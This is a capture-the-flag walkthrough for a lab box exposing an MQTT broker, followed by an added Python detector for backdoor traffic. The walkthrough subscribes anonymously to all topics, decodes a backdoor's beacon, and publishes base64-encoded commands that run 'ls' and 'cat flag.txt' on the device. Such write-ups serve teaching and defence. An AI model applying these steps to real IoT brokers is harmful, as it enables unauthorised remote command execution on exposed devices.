Bugged
Started with a basic nmap scan: no result.
Installed and used rustscan (install it via Docker or Cargo: "sudo apt install docker.io", or "sudo apt install cargo" followed by "cargo install rustscan").
There are many ways to install it and you may or may not be able to install it properly; it may need to be uninstalled several times. If you can install it within an hour, consider yourself lucky and buy a lottery ticket. Otherwise you are in for a very looooooooong ride. Enjoy!!!
Make good use of Pentester's GPT if you want to be quicker.
Run "rustscan -a 10.10.159.75 --config-path /home/kali/.rustscan.tom"
We got:
PORT STATE SERVICE REASON
1883/tcp open mqtt syn-ack
Run nmap on port 1883: "nmap -A -p 1883 10.10.159.75"
THEORY ON MQTT
MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, extremely simple, and lightweight messaging protocol, designed for constrained devices and low-bandwidth, high-latency, or unreliable networks. The design principles are to minimize network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal for the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium.
Default port: 1883
Basic Information About ‘MQTT’
For more: https://www.hivemq.com/blog/mqtt-essentials-part-5-mqtt-topics-best-practices/
Use "sudo nmap <ip> -p 1883 -sC -sV" for further details:
PORT STATE SERVICE VERSION
1883/tcp open mosquitto version 2.0.14
Install the tool 'mosquitto':
"sudo apt-get install mosquitto mosquitto-clients -y"
Then run "mosquitto_sub -h <ip> -p 1883 -t '#'" (the # wildcard subscribes to every topic on the broker, which works here because the broker allows anonymous clients to read everything)
We get:
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
which decodes to:
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","registered_commands":["HELP","CMD","SYS"],"pub_topic":"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub","sub_topic":"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}
So the device tells us:
id: cdd1b1c0-1c40-4b0f-8e22-61b357548b7d
the topic it publishes to: "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub"
the commands it accepts: "HELP", "CMD", "SYS"
the topic it subscribes to (its control channel): "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"
With this command running in one terminal, so we see whatever the device publishes:
mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 10.10.20.204
in another terminal we emulate the device's controller by publishing to its subscribe topic:
mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "simple_massage" -h 10.10.20.204
The reply shows up in the first terminal, base64-encoded, as:
SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk=
which decodes to:
Invalid message format. Format: base64({"id": "<backdoor id>", "cmd": "<command>", "arg": "<argument>"})
So we have to build our message in this format and base64-encode it to get a valid payload. Let's cook:
{"id": "<backdoor id>", "cmd": "<command>", "arg": "<argument>"}
id: cdd1b1c0-1c40-4b0f-8e22-61b357548b7d
cmd: CMD
arg: ls
{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "CMD", "arg": "ls"}
Then to base64, which is:
eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==
Now passing it as the message to mosquitto_pub:
mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==" -h 10.10.20.204
We get back:
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZy50eHRcbiJ9
which is:
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag.txt\n"}
We cook again:
{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "CMD", "arg": "cat flag.txt"}
Change to base64:
eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0NCg==
mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0NCg==" -h 10.10.20.204
We get:
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3sxOGQ0NGZjMDcwN2FjOGRjOGJlNDViYjgzZGI1NDAxM31cbiJ9
which decodes to:
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag{18d44fc0707ac8dc8be45bb83db54013}\n"}
Kistimaat !!!!!!!
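As an added example (not part of the original writeup), here is a small Python detector that applies the backdoor's own wire format from above to traffic seen on the broker: it decodes each payload, labels beacons, command messages and command responses, and ignores ordinary sensor data. The beacon payload and topic names are taken from the writeup; the other sample messages are constructed.

```python
import base64
import binascii
import json

# The beacon the box publishes, copied from the writeup.
BEACON_B64 = "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ=="

# Constructed sample of (topic, payload) pairs, as a broker-side tap or a
# mosquitto_sub -t "#" log would hand them to us: the beacon, one control
# message in the backdoor's format, and two ordinary sensor readings.
SAMPLE_MESSAGES = [
    ("U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub", BEACON_B64),
    ("XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub",
     base64.b64encode(json.dumps(
         {"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d",
          "cmd": "CMD", "arg": "ls"}).encode()).decode()),
    ("home/livingroom/temperature", "21.5"),
    ("home/frontdoor/state", "closed"),
]


def decode_payload(payload):
    """Return the parsed JSON object if payload is base64(JSON), else None."""
    try:
        obj = json.loads(base64.b64decode(payload, validate=True))
    except (binascii.Error, ValueError):
        return None
    return obj if isinstance(obj, dict) else None


def classify(payload):
    """Label one MQTT message using the backdoor's own message shapes."""
    obj = decode_payload(payload)
    if obj is None:
        return "benign"      # not base64(JSON): plain sensor data
    if "registered_commands" in obj and "sub_topic" in obj:
        return "beacon"      # device advertising its control topic
    if {"id", "cmd", "arg"} <= obj.keys():
        return "command"     # someone driving the device
    if "response" in obj:
        return "response"    # command output flowing back out
    return "benign"


def scan(messages):
    """Return [(topic, label)] for every message that is not benign."""
    return [(t, classify(p)) for t, p in messages if classify(p) != "benign"]


if __name__ == "__main__":
    for topic, label in scan(SAMPLE_MESSAGES):
        print(f"{label:8s} on topic {topic}")
```

In a real deployment the same check belongs in the broker's logs or an ACL review: a device that advertises a command channel over anonymous, unauthenticated MQTT is the finding, whatever the topic names are.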